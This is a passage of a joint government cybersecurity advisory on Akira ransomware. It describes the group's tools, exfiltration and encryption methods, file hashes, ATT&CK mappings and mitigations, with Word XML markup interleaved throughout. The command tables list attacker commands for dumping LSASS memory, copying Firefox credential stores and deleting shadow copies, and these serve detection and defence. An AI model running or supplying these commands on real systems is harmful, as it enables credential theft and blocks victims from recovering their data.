purposes [T1016] and net Windows commands are used to identify domain controllers [T1018] and gather information on domain trust relationships [T1482].</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See Table 1 for a descriptive listing of these tools. Defense Evasion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Based on trusted third party investigations, Akira threat actors have been observed deploying two distinct ransomware variants against different system architectures within the same compromise event. This marks a shift from recently reported Akira ransomware activity. Akira threat actors were first observed deploying the Windows-specific "Megazord" ransomware, with further analysis revealing that a second payload was concurrently deployed in this attack (which was later identified as a novel variant of the Akira ESXi encryptor, "Akira_v2").</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As Akira threat actors prepare for lateral movement, they commonly disable security software to avoid detection. Cybersecurity researchers have observed Akira threat actors using PowerTool to exploit the Zemana AntiMalware driver[4] and terminate antivirus-related processes [T1562.001]. Exfiltration and Impact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Akira threat actors leverage tools such as FileZilla, WinRAR [T1560.001], WinSCP, and RClone to exfiltrate data [T1048]. To establish command and control channels, threat actors leverage readily available tools like AnyDesk, MobaXterm, RustDesk, Ngrok, and Cloudflare Tunnel, enabling exfiltration through various protocols such as File Transfer Protocol (FTP), Secure File Transfer Protocol (SFTP), and cloud storage services like Mega [T1537] to connect to exfiltration servers.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Akira threat actors use a double-extortion model [T1657] and encrypt systems [T1486] after exfiltrating data. The Akira ransom note provides each company with a unique code and instructions to contact the threat actors via a .onion URL. Akira threat actors do not leave an initial ransom demand or payment instructions on compromised networks, and do not relay this information until contacted by the victim. Ransom payments are paid in Bitcoin to cryptocurrency wallet addresses provided by the threat actors. To further apply pressure, Akira threat actors threaten to publish exfiltrated data on the Tor network, and in some instances have called victimized companies, according to FBI reporting. Encryption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Akira threat actors utilize a sophisticated hybrid encryption scheme to lock data. This involves combining a ChaCha20 stream cipher with an RSA public-key cryptosystem for speed and secure key exchange [T1486]. This multilayered approach tailors encryption methods based on file type and size and is capable of full or partial encryption. Encrypted files are appended with either a .akira or .powerranges extension. To further inhibit system recovery, Akira's encryptor (w.exe) utilizes PowerShell commands to delete volume shadow copies (VSS) on Windows systems [T1490]. Additionally, a ransom note named fn.txt appears in both the root directory (C:) and each users' home directory (C:\Users).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Trusted third party analysis identified that the Akira_v2 encryptor is an upgrade from its previous version, which includes additional functionalities due to the language it's written in (Rust). Previous versions of the encryptor provided options to insert arguments at runtime, including: -p --encryption_path (targeted file/folder paths) -s --share_file (targeted network drive path) -n --encryption_percent (percentage of encryption) --fork (create a child process for encryption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ability to insert additional threads allows Akira threat actors to have more granular control over the number of CPU cores in use, increasing the speed and efficiency of the encryption process. The new version also adds a layer of protection, utilizing the Build ID as a run condition to hinder dynamic analysis. The encryptor is unable to execute successfully without the unique Build ID. The ability to deploy against only virtual machines using "vmonly" and the ability to stop running virtual machines with "stopvm" functionalities have also been observed implemented for Akira_v2. After encryption, the Linux ESXi variant may include the file extension "akiranew" or add a ransom note named "akiranew.txt" in directories where files were encrypted with the new nomenclature. Leveraged Tools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 lists publicly available tools and applications Akira threat actors have used, including legitimate tools repurposed for their operations. Use of these tools and applications should not be attributed as malicious without analytical evidence to support threat actor use and/or control. Table 1: Tools Leveraged by Akira Ransomware Actors Name Description AdFind AdFind.exe is used to query and retrieve information from Active Directory.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Advanced IP Scanner A network scanner is used to locate all the computers on a network and conduct a scan of their ports. The program shows all network devices, gives access to shared folders, and provides remote control of computers (via RDP and Radmin).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>AnyDesk A common software that can be maliciously used by threat actors to obtain remote access and maintain persistence [T1219]. AnyDesk also supports remote file transfer.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>LaZagne Allows users to recover stored passwords on Windows, Linux, and OSX systems.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>PCHunter64 A tool used to acquire detailed process and system information [T1082].[7] PowerShell A cross-platform task automation solution made up of a command line shell, a scripting language, and a configuration management framework, which runs on Windows, Linux, and macOS.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Mimikatz Allows users to view and save authentication credentials such as Kerberos tickets.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Ngrok A reverse proxy tool [T1090] used to create a secure tunnel to servers behind firewalls or local machines without a public IP address. RClone A command line program used to sync files with cloud storage services [T1567.002] such as Mega.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>SoftPerfect A network scanner (netscan.exe) used to ping computers, scan ports, discover shared folders, and retrieve information about network devices via Windows Management Instrumentation (WMI), Simple Network Management Protocol (SNMP), HTTP, Secure Shell (SSH) and PowerShell. It also scans for remote services, registry, files, and performance counters. WinRAR Used to split compromised data into segments and to compress [T1560.001] files into .RAR format for exfiltration.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>WinSCP Windows Secure Copy is a free and open source SSH File Transfer Protocol, File Transfer Protocol, WebDAV, Amazon S3, and secure copy protocol client. Akira threat actors have used it to transfer data [T1048] from a compromised network to actor-controlled accounts. Indicators of Compromise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Disclaimer: Investigation or vetting of these indicators is recommended prior to taking action, such as blocking. Table 2a: Malicious Files Affiliated with Akira Ransomware File Name Hash (SHA-256) Description w.exe d2fd0654710c27dcf37b6c1437880020824e161dd0bf28e3a133ed777242a0ca Akira ransomware Win.exe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>dcfa2800754e5722acf94987bb03e814edcb9acebda37df6da1987bf48e5b05e Akira ransomware encryptor AnyDesk.exe bc747e3bf7b6e02c09f3d18bdd0e64eef62b940b2f16c9c72e647eec85cf0138 Remote desktop application Gcapi.dll 73170761d6776c0debacfbbc61b6988cb8270a20174bf5c049768a264bb8ffaf DLL file that assists with the execution of AnyDesk.exe Sysmon.exe 1b60097bf1ccb15a952e5bcc3522cf5c162da68c381a76abc2d5985659e4d386 Ngrok tool for persistence Config.yml Varies by use Ngrok configuration file Rclone.exe aaa647327ba5b855bedea8e889b3fafdc05a6ca75d1cfd98869432006d6fecc9 Exfiltration tool Winscp.rnd 7d6959bb7a9482e1caa83b16ee01103d982d47c70c72fdd03708e2b7f4c552c4 Network file transfer program WinSCP-6.1.2-Setup.exe 36cc31f0ab65b745f25c7e785df9e72d1c8919d35a1d7bd4ce8050c8c068b13c Network file transfer program Akira_v2</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3298d203c2acb68c474e5fdad8379181890b4403d6491c523c13730129be3f75</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0ee1d284ed663073872012c7bde7fac5ca1121403f1a5d2d5411317df282796c Akira_v2 ransomware Megazord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ffd9f58e5fe8502249c67cad0123ceeeaa6e9f69b4ec9f9e21511809849eb8fc</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dfe6fddc67bdc93b9947430b966da2877fda094edf3e21e6f0ba98a84bc53198</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131da83b521f610819141d5c740313ce46578374abb22ef504a7593955a65f07</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9f393516edf6b8e011df6ee991758480c5b99a0efbfd68347786061f0e04426c</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9585af44c3ff8fd921c713680b0c2b3bbc9d56add848ed62164f7c9b9f23d065</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2f629395fdfa11e713ea8bf11d40f6f240acf2f5fcf9a2ac50b6f7fbc7521c83</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7f731cc11f8e4d249142e99a44b9da7a48505ce32c4ee4881041beeddb3760be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95477703e789e6182096a09bc98853e0a70b680a4f19fa2bf86cbb9280e8ec5a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0c0e0f9b09b80d87ebc88e2870907b6cacb4cd7703584baf8f2be1fd9438696d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C9c94ac5e1991a7db42c7973e328fceeb6f163d9f644031bdfd4123c7b3898b0 Akira "Megazord" ransomware VeeamHax.exe aaa6041912a6ba3cf167ecdb90a434a62feaf08639c59705847706b9f492015d Plaintext credential leaking tool Veeam-Get-Creds.ps1 18051333e658c4816ff3576a2e9d97fe2a1196ac0ea5ed9ba386c46defafdb88 PowerShell script for obtaining and decrypting accounts from Veeam servers PowershellKerberos TicketDumper 5e1e3bf6999126ae4aa52146280fdb913912632e8bac4f54e98c58821a307d32 Kerberos ticket dumping tool from LSA cache sshd.exe 8317ff6416af8ab6eb35df3529689671a700fdb61a5e6436f4d6ea8ee002d694 OpenSSH Backdoor sshd.exe 8317ff6416af8ab6eb35df3529689671a700fdb61a5e6436f4d6ea8ee002d694 OpenSSH Backdoor ipscan-3.9.1-setup.exe 892405573aa34dfc49b37e4c35b655543e88ec1c5e8ffb27ab8d1bbf90fc6ae0 Network scanner that scans IP addresses and ports Table 2b: Malicious Files Affiliated with Akira Ransomware File Name Hash (MD5) Description winrar-x64-623.exe 7a647af3c112ad805296a22b2a276e7c Network file transfer program Table 3a: Commands Affiliated with Akira Ransomware Persistence and Discovery nltest /dclist: [T1018] nltest /DOMAIN_TRUSTS [T1482] net group "Domain admins" /dom [T1069.002] net localgroup "Administrators" /dom [T1069.001] tasklist [T1057] rundll32.exe c:\Windows\System32\comsvcs.dll, MiniDump ((Get-Process lsass).Id) C:\windows\temp\lsass.dmp full [T1003.001] Table 3b: Commands Affiliated with Akira Ransomware Credential Access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cmd.exe /Q /c esentutl.exe /y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"C:\Users\&lt;username&gt;\AppData\Roaming\Mozilla\Firefox\Profiles\&lt;firefox_profile_id&gt;.default-release\key4.db" /d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"C:\Users\&lt;username&gt;\AppData\Roaming\Mozilla\Firefox\Profiles\&lt;firefox_profile_id&gt;.default-release\key4.db.tmp"</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Note: Used for accessing Firefox data. Table 3c: Commands Affiliated with Akira Ransomware Impact powershell.exe -Command "Get-WmiObject Win32_Shadowcopy | Remove- WmiObject" [T1490] MITRE ATT&amp;CK TACTICS AND TECHNIQUES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See Tables 4 -12 for all referenced Akira threat actor tactics and techniques for enterprise environments in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&amp;CK framework, see CISA and MITRE ATT&amp;CK's Best Practices for MITRE ATT&amp;CK Mapping and CISA's Decider Tool. Table 4: Initial Access Technique Title ID Use Valid Accounts T1078 Akira threat actors obtain and abuse credentials of existing accounts as a means of gaining initial access.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Exploit Public Facing Application T1190 Akira threat actors exploit vulnerabilities in internet-facing systems to gain access to systems. External Remote Services T1133 Akira threat actors have used remote access services, such as RDP/VPN connection to gain initial access.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Phishing: Spearphishing Attachment T1566.001 Akira threat actors use phishing emails with malicious attachments to gain access to networks. Phishing: Spearphishing Link T1566.002 Akira threat actors use phishing emails with malicious links to gain access to networks. Table 5: Credential Access Technique Title ID Use OS Credential Dumping T1003 Akira threat actors use tools like Mimikatz and LaZagne to dump credentials.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OS Credential Dumping:</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LSASS Memory T1003.001 Akira threat actors attempt to access credential material stored in the process memory of the LSASS. Table 6: Discovery Technique Title ID Use System Network Configuration Discovery T1016 Akira threat actors use tools to scan systems and identify services running on remote hosts and local network infrastructure.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>System Information Discovery T1082 Akira threat actors use tools like PCHunter64 to acquire detailed process and system information.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Domain Trust Discovery T1482 Akira threat actors use the net Windows command to enumerate domain information.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Process Discovery T1057 Akira threat actors use the Tasklist utility to obtain details on running processes via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>PowerShell.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Permission Groups Discovery: Local Groups T1069.001 Akira threat actors use the net localgroup /dom to find local system groups and permission settings.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Permission Groups Discovery: Domain Groups T1069.002 Akira threat actors use the net group /domain command to attempt to find domain level groups and permission settings.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Remote System Discovery T1018 Akira threat actors use nltest / dclist to amass a listing of other systems by IP address, hostname, or other logical identifiers on a network. Table 7: Persistence Technique Title ID Use Create Account: Domain Account T1136.002 Akira threat actors attempt to abuse the functions of domain controllers by creating new domain accounts to establish persistence. Table 8: Defense Evasion Technique Title ID Use Impair Defenses: Disable or Modify Tools T1562.001 Akira threat actors use BYOVD attacks to disable antivirus software. Table 9: Command and Control Technique Title ID Use Remote Access Software T1219 Akira threat actors use legitimate desktop support software like AnyDesk to obtain remote access to victim systems. Proxy T1090 Akira threat actors utilized Ngrok to create a secure tunnel to servers that aided in exfiltration of data. Table 10: Collection Technique Title ID Use Archive Collected Data: Archive via Utility T1560.001 Akira threat actors use tools like WinRAR to compress files. Table 11: Exfiltration Technique Title ID Use Exfiltration Over Alternative Protocol T1048 Akira threat actors use file transfer tools like WinSCP to transfer data.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Transfer Data to Cloud Account T1537 Akira threat actors use tools like CloudZilla to exfiltrate data to a cloud account and connect to exfil servers they control.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Exfiltration Over Web Service: Exfiltration to Cloud Storage T1567.002 Akira threat actors leveraged RClone to sync files with cloud storage services to exfiltrate data. Table 12: Impact Technique Title ID Use Date Encrypted for Impact T1486 Akira threat actors encrypt data on target systems to interrupt availability to system and network resources.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Inhibit System Recovery T1490 Akira threat actors delete volume shadow copies on Windows systems.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Financial Theft T1657 Akira threat actors use a double-extortion model for financial gain. MITIGATIONS Network Defenders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FBI, CISA, EC3, and NCSC-NL recommend organizations apply the following mitigations to limit potential adversarial use of common system and network discovery techniques, and to reduce the risk of compromise by Akira ransomware. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats and TTPs. Visit CISA's Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (e.g., hard drive, storage device, the cloud) [CPG 2.F, 2.R, 2.S].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Require all accounts with password logins (e.g., service accounts, admin accounts, and domain admin accounts) to comply with NIST's standards. In particular, require employees to use long passwords and consider not requiring recurring password changes, as these can weaken security [CPG 2.C]. Require multifactor authentication for all services to the extent possible, particularly for webmail, virtual private networks, and accounts that access critical systems [CPG 2.H].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Keep all operating systems, software, and firmware up to date. Timely patching is one of the most efficient and cost effective steps an organization can take to minimize its exposure to cybersecurity threats. Prioritize patching known exploited vulnerabilities in internet-facing systems. [CPG 1.E].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Segment networks to prevent the spread of ransomware. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between-and access to-various subnetworks and by restricting adversary lateral movement [CPG 2.F].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool. To aid in detecting the ransomware, implement a tool that logs and reports all network traffic, including lateral movement activity on a network. Endpoint detection and response (EDR) tools are particularly useful for detecting lateral connections as they have insight into common and uncommon network connections for each host [CPG 3.A].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Filter network traffic by preventing unknown or untrusted origins from accessing remote services on internal systems. This prevents threat actors from directly connecting to remote access services that they have established for persistence.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Install, regularly update, and enable real time detection for antivirus software on all hosts.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Review domain controllers, servers, workstations, and active directories for new and/or unrecognized accounts [CPG 1.A, 2.O].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Audit user accounts with administrative privileges and configure access controls according to the principle of least privilege [CPG 2.E].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Disable unused ports [CPG 2.V].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Consider adding an email banner to emails received from outside of your organization [CPG 2.M].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Disable hyperlinks in received emails.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Implement time-based access for accounts set at the admin level and higher. For example, the Just-in-Time (JIT) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>access method provisions privileged access when needed and can support enforcement of the principle of least privilege (as well as the Zero Trust model). This is a process where a network-wide policy is set in place to automatically disable admin accounts at the Active Directory level when the account is not in direct need. Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Disable command-line and scripting activities and permissions. Privilege escalation and lateral movement often depend on software utilities running from the command line. If threat actors are not able to run these tools, they will have difficulty escalating privileges and/or moving laterally [CPG 2.E, 2.N].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Maintain offline backups of data, and regularly maintain backup and restoration [CPG 2.R]. By instituting this practice, the organization helps ensure they will not be severely interrupted, and/or only have irretrievable data.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Ensure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization's data infrastructure [CPG 2.K, 2.L, 2.R]. VALIDATE SECURITY CONTROLS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addition to applying mitigations, the FBI, CISA, EC3, and NCSC-NL recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&amp;CK for Enterprise framework in this advisory. The FBI, CISA, EC3 and NCSC-NL recommend testing your existing security controls inventory to assess how they perform against the ATT&amp;CK techniques described in this advisory.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 get started: Select an ATT&amp;CK technique described in this advisory (see Tables 4 -12). Align your security technologies against the technique.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Test your technologies against the technique.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Analyze your detection and prevention technologies' performance.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Repeat the process for all security technologies to obtain a set of comprehensive performance data.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Tune your security program, including people, processes, and technologies, based on the data generated by this process.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FBI, CISA, EC3, and NCSC-NL recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&amp;CK techniques identified in this advisory. RESOURCES Stopransomware.gov is a whole-of-government approach that gives one central location for ransomware resources and alerts.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Resource to mitigate a ransomware attack: #StopRansomware Guide.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>No cost cyber hygiene services: Cyber Hygiene Services, Ransomware Readiness Assessment. REFERENCES Fortinet: Ransomware Roundup - Akira Cisco: Akira Ransomware Targeting VPNs without MFA Truesec: Indications of Akira Ransomware Group Actively Exploiting Cisco AnyConnect CVE-2020-3259 TrendMicro: Akira Ransomware Spotlight CrowdStrike: What is a Kerberoasting Attack?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Sophos: Akira, again: The ransomware that keeps on taking Sophos: Akira Ransomware is "bringin' 1988 back" REPORTING</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Your organization has no obligation to respond or provide information back to the FBI in response to this joint CSA. If, after reviewing the information provided, your organization decides to provide information to the FBI, reporting must be consistent with applicable state and federal laws.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FBI is interested in any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with Akira threat actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file.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Additional details of interest include: a targeted company point of contact, status and scope of infection, estimated loss, operational impact, transaction IDs, date of infection, date detected, initial attack vector, and host- and network-based indicators.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FBI, CISA, EC3, and NCSC-NL do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to the FBI's Internet Crime Complain Center (IC3), a local FBI Field Office, or CISA via the agency's Incident Reporting System or its 24/7 Operations Center (report@cisa.gov or (888) 282-0870). DISCLAIMER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information in this report is being provided "as is" for informational purposes only. The FBI, CISA, EC3, and NCSC-NL do not endorse any commercial 